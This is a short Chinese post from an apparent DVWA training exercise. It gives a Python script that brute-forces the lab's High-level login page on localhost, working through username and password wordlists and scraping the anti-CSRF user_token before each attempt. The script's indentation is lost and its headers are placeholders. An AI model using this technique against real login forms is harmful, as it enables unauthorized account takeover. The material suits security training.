DVWA brute force暴力破解High级别python破解脚本
编写工具:python3.8
用到的库:re、requests
源码:
import re
import requests
header1 = {
访问http://localhost/dvwa/vulnerabilities/brute/的请求头信息
}
header2 = {
登录提交处的请求头信息
}
for username in open("username.txt"):
for password in open('password.txt'):
token = re.findall("name='user_token' value='(.*?)' />",requests.get("http://localhost/dvwa/vulnerabilities/brute/",headers=header1).text)
url = 'http://localhost/dvwa/vulnerabilities/brute/?username='+username+'&password='+password+'&Login=Login&user_token='+token[0]
url = url.replace("\n","")
attack = requests.get(url,headers=header2)
print('username =',username.replace("\n",""))
print('password =',password.replace("\n",""))
print('Length =',len(attack.text))
print(attack.text)